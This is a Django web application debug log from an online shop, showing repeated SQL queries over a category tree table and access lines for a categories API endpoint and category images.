DEBUG 2019-12-19 06:34:47,678 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 06:34:47,682 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 06:34:47,686 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 06:34:47,690 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 06:34:47,697 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 06:34:47,701 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 06:34:47,706 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 06:34:47,710 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 06:34:47,714 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 06:34:47,718 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 06:34:47,723 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 06:34:47,727 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 06:34:47,731 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 06:34:47,736 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 06:34:47,740 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 06:34:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 06:34:49] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 06:34:49] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 06:37:48] "GET / HTTP/1.0" 302 0 [19/Dec/2019 06:41:09] "GET / HTTP/1.0" 302 0 [19/Dec/2019 06:42:51] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 06:49:51,742 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 06:49:51,752 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 06:49:51,757 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 06:49:51,760 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 06:49:51,765 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 06:49:51,769 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 06:49:51,771 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 06:49:51,773 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 06:49:51,775 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 06:49:51,779 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 06:49:51,781 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 06:49:51,783 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 06:49:51,785 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 06:49:51,787 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 06:49:51,791 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 06:49:51,793 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 06:49:51,795 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 06:49:51,797 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 06:49:51,800 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 06:49:51,803 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 06:49:51,806 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 06:49:51,810 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 06:49:51,813 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 06:49:51,816 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 06:49:51,818 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 06:49:51,822 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 06:49:51,824 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 06:49:51,827 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 06:49:51,829 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 06:49:51,831 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 06:49:51,835 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 06:49:51,838 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 06:49:51,840 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 06:49:51,842 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 06:49:51,845 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 06:49:51,848 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 06:49:51,850 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 06:49:51,853 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 06:49:51,855 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 06:49:51,857 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 06:49:51,859 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 06:49:51,862 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 06:49:51,864 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 06:49:51,866 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 06:49:51,869 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 06:49:51,872 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 06:49:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 06:50:01,963 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 06:50:01,975 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 06:50:01,981 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 06:50:01,984 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 06:50:01,993 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 06:50:01,997 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 